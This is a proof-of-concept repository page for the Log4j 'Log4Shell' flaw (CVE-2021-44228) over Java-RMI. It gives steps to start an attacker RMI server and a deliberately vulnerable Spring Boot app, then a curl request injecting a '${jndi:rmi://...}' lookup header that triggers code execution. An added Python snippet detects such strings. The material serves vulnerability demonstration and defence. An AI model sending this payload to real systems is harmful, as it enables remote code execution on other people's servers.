Description
A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI
Introduction
# log4shell-rmi-poc
A Proof of Concept of the Log4j vulnerability (CVE-2021-44228) over Java-RMI
<br/>
It uses Log4j 2.5.7 from spring-boot-starter-log4j2
## Requirements:
Tested with Java 8 (JDK 1.8.0_25) and Java 11 (JDK 11.0.1)
## How to run the POC
### 1. Clone the repo:
```bash
git clone https://github.com/Labout/log4shell-rmi-poc.git
```
### 2. Start the attacker RMI Server
```bash
cd Log4jshell_rmi_server
./mvnw clean package
java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar
```
You should get something like this:

### 3. Start the vulnerable Log4j application (here a Spring Boot application)
In a new terminal:
```bash
cd vulnerabel_log4j_app
./mvnw clean package
java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar
```
### 4. Send a JNDI lookup string in the "Accept-Version" header
```bash
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'
```
As you can see, the vulnerable app calls the Calculator app.
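
A defender-side check for the request in step 4, added here as an example (it is not part of the PoC repository): it scans request header values for plain `${jndi:...}` lookup strings, URL-decoding them first, and extracts the callback endpoint so it can be alerted on or blocked at egress. The function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches a plain JNDI lookup string such as the one sent in step 4.
# Assumption: nested-lookup obfuscation is out of scope for this check.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?/(?P<name>[^}\s]*)\}",
    re.IGNORECASE,
)


def find_jndi_lookups(headers):
    """Return one finding per JNDI lookup string found in any header value."""
    findings = []
    for name, value in headers.items():
        decoded = unquote(value)  # access logs often store values URL-encoded
        for m in JNDI_RE.finditer(decoded):
            findings.append({
                "header": name,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "name": m.group("name"),
            })
    return findings


# Constructed sample requests (header dicts); the first mirrors the curl call in step 4.
SAMPLE_REQUESTS = [
    {"Host": "localhost:8080", "Accept-Version": "${jndi:rmi://127.0.0.1:1099/ExecByEL}"},
    {"Host": "localhost:8080", "Accept-Version": "v1"},
    {"Host": "localhost:8080", "Accept-Version": "%24%7BJNDI:rmi://127.0.0.1:1099/ExecByEL%7D"},
]


def scan(requests):
    """Return (request index, finding) pairs for every suspicious header."""
    return [(i, f) for i, req in enumerate(requests) for f in find_jndi_lookups(req)]


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: {f['header']} -> "
              f"{f['scheme']}://{f['host']}:{f['port']}/{f['name']}")
```
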

File snapshot
```
[4.0K]  /data/pocs/b3c9e3a34e13a44039569825a94dbd6812bb0439
├── [794K]  exploit.png
├── [4.0K]  Log4jshell_rmi_server
│   ├── [9.8K]  mvnw
│   ├── [6.5K]  mvnw.cmd
│   ├── [1.2K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  com
│           │       └── [4.0K]  log4j
│           │           └── [4.0K]  exploit
│           │               └── [4.0K]  rmi
│           │                   └── [1.6K]  RmiServer.java
│           └── [4.0K]  resources
│               └── [   0]  application.properties
├── [1.2K]  README.md
├── [245K]  rmi_server.png
└── [4.0K]  vulnerabel_log4j_app
    ├── [4.0K]  logs
    │   └── [4.0K]  2021-12
    │       ├── [ 919]  spring-boot-logger-log4j2--18-December-2021-1.log.gz
    │       ├── [ 295]  spring-boot-logger-log4j2--18-December-2021-2.log.gz
    │       ├── [ 915]  spring-boot-logger-log4j2--18-December-2021-3.log.gz
    │       ├── [ 844]  spring-boot-logger-log4j2--18-December-2021-4.log.gz
    │       ├── [ 763]  spring-boot-logger-log4j2--18-December-2021-5.log.gz
    │       ├── [ 690]  spring-boot-logger-log4j2--18-December-2021-6.log.gz
    │       ├── [ 694]  spring-boot-logger-log4j2--18-December-2021-7.log.gz
    │       ├── [1.2K]  spring-boot-logger-log4j2--19-December-2021-1.log.gz
    │       ├── [1.6K]  spring-boot-logger-log4j2--19-December-2021-2.log.gz
    │       ├── [1.0K]  spring-boot-logger-log4j2--19-December-2021-3.log.gz
    │       └── [ 812]  spring-boot-logger-log4j2--19-December-2021-4.log.gz
    ├── [9.8K]  mvnw
    ├── [6.5K]  mvnw.cmd
    ├── [1.6K]  pom.xml
    └── [4.0K]  src
        ├── [4.0K]  main
        │   ├── [4.0K]  java
        │   │   └── [4.0K]  com
        │   │       └── [4.0K]  log4j
        │   │           └── [4.0K]  vulnerabel
        │   │               └── [4.0K]  app
        │   │                   ├── [ 633]  Log4jController.java
        │   │                   └── [ 410]  VulnerabelLog4jApplication.java
        │   └── [4.0K]  resources
        │       └── [   0]  application.properties
        └── [4.0K]  test
            └── [4.0K]  java
                └── [4.0K]  com
                    └── [4.0K]  log4j
                        └── [4.0K]  vulnerabel
                            └── [4.0K]  app
                                └── [ 225]  VulnerabelLog4JApplicationTests.java

26 directories, 26 files
```